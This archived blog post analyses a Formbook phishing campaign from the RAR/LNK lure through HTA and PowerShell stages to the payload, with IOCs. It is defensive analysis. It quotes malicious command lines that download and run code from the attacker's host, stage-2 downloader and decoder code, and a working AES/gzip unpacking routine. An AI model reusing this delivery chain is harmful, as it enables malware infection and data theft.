[QuickNote] Examining Formbook Campaign via Phishing Emails
Published: 2023-07-06 · Archived: 2026-04-05 18:19:02 UTC

1. Initial foothold

The attacker sent an email with an attachment named "brochure-for-2023-elite-events.rar". This rar archive contains a single lnk (shortcut) file named brochure-for-2023-elite-events.pdf.lnk. If the user does not pay attention and extracts the file, it is displayed with a PDF icon like the following:

Analysis of this lnk file reveals that it uses powershell.exe to execute an hta script (the wildcard path in the command expands to mshta.exe under System32):

    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" \W*\\\*2\\\msh*e ('http'+'://thanhancompa

2. Analyzing HTA script

Download the file pintu.hta for analysis. This file contains a VBScript code snippet as follows:

To facilitate the deobfuscation of the code snippet above, I have modified it as follows:

https://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/ Page 1 of 7

Executing the modified pintu.hta yields a VBScript containing a function that runs the next PowerShell script.

3. Analyzing the 1st Powershell script

    ZAA = "powershell[.]exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -A

The script performs the following tasks:

- Decode the base64 string assigned to the variable $xbFz; the first 16 bytes are used as the IV and the remaining bytes are the encrypted data.
- Decode the base64 string assigned to the variable $HMTijTI and use it as the AES key.
- Using the key and IV, decrypt the encrypted data with AES in the mode set by $BfslXFB.Mode = [System.Security.Cryptography.CipherMode]::ECB.

Because the first two bytes of the result are 0x1F 0x8B, we know that the decrypted data has been compressed with Gzip.
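The decrypt-and-unpack step described above, reproduced as an added PowerShell example (not code from the original post or from the sample): the parameter names $xbFz and $HMTijTI are the post's variable names, while the key, the script text and the resulting blob are constructed here for a round trip rather than the campaign's real values.

```powershell
# Added example: reproduce stage 1's decrypt-and-unpack with the same .NET primitives.
# $xbFz / $HMTijTI are the post's variable names; all values below are constructed.
function Unpack-Stage2 {
    param(
        [Parameter(Mandatory)][string]$xbFz,     # base64: 16-byte IV || AES ciphertext
        [Parameter(Mandatory)][string]$HMTijTI   # base64 AES key
    )
    $raw = [Convert]::FromBase64String($xbFz)
    $iv  = [byte[]]$raw[0..15]                   # first 16 bytes carried as the "IV"
    $ct  = [byte[]]$raw[16..($raw.Length - 1)]   # remainder is the encrypted data
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::ECB   # IV is never used in ECB
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = [Convert]::FromBase64String($HMTijTI)
    $aes.IV  = $iv
    $plain = $aes.CreateDecryptor().TransformFinalBlock($ct, 0, $ct.Length)
    # Gzip magic 0x1F 0x8B marks the decrypted blob as compressed, as seen in the sample
    if ($plain.Length -lt 2 -or $plain[0] -ne 0x1F -or $plain[1] -ne 0x8B) {
        throw "decrypted data is not gzip (wrong key or not this stage): first bytes $($plain[0..1])"
    }
    $gz  = New-Object System.IO.Compression.GzipStream(
               (New-Object System.IO.MemoryStream(,$plain)),
               [System.IO.Compression.CompressionMode]::Decompress)
    $out = New-Object System.IO.MemoryStream
    $gz.CopyTo($out); $gz.Dispose()
    return [System.Text.Encoding]::UTF8.GetString($out.ToArray())
}

# Constructed sample: gzip a harmless script and encrypt it the way the dropper expects,
# so the function above can be exercised without the real campaign blob.
function New-StageBlob([string]$Script, [byte[]]$Key) {
    $ms = New-Object System.IO.MemoryStream
    $gz = New-Object System.IO.Compression.GzipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($Script)
    $gz.Write($bytes, 0, $bytes.Length); $gz.Dispose()
    $packed = $ms.ToArray()
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode = [System.Security.Cryptography.CipherMode]::ECB
    $aes.Key  = $Key
    $ct = $aes.CreateEncryptor().TransformFinalBlock($packed, 0, $packed.Length)
    return [Convert]::ToBase64String([byte[]]($aes.IV + $ct))   # random IV prepended, unused by ECB
}

$key  = [byte[]](1..32)                                        # constructed 256-bit key
$blob = New-StageBlob "Write-Host 'stage 2 would run here'" $key
Unpack-Stage2 -xbFz $blob -HMTijTI ([Convert]::ToBase64String($key))
```

Running the last line prints the embedded script text back; feeding a wrong key hits the gzip-magic check rather than producing garbage.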
Decompressing this data yields the next PowerShell script:

4. Analyzing the 2nd Powershell script

The important part of this script is as follows:

    # Decoder: each integer minus 6399 yields one character of the hidden string
    function Dlt($iZq) {
        $IBY = 6399; $dtu = $Null
        foreach ($kKX in $iZq) { $dtu += [char]($kKX - $IBY) }
        return $dtu
    }
    # Downloader: builds %AppData% paths for the decoy PDF and the payload, then fetches whatever is missing
    function RPJ() { $oUv = $env:AppData + '\'; $DASUDIl = $env:AppData; $GXIrywM = $DASUDIl + '\blank.pdf '; If(Test-Pat
    883.exe '; if (Test-Path -Path $DauGlabYW){pmh $DauGlabYW;}Else{ $ZbmZaJRahvY = zPg (Dlt @(6503,6

The Dlt function decodes the download addresses of the next-stage files. Rewriting this function in Python and running it over the encoded arrays gives the download addresses of the payload and the decoy PDF:

    [+] Defanged URL(s):
    hxxps://mag[.]wcoomd.org/uploads/2018/05/blank.pdf
    hxxps://thanhancompany[.]com/grip/883.exe

5. Formbook payload

At the time of analysis, I was able to download the payload; its sha256 is:

    00f20471ea61f5b0f5a1e2e9be722369ea515aaea80283aa046bd47e51f952e4

When executed, the .NET payload unpacks the final payload, which is the FormBook malware (likely a new build).

Running the payload under Fakenet and monitoring its execution shows it generating traffic to the following hosts:

6. IOCs:

    hxxp://thanhancompany[.]com/ta/pintu.hta                            Hta script
    hxxps://mag[.]wcoomd.org/uploads/2018/05/blank.pdf                  Decoy PDF
    hxxps://thanhancompany[.]com/grip/883.exe                           Payload URI
    00f20471ea61f5b0f5a1e2e9be722369ea515aaea80283aa046bd47e51f952e4    Payload SHA256

End.
m4n0w4r

Source: https://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/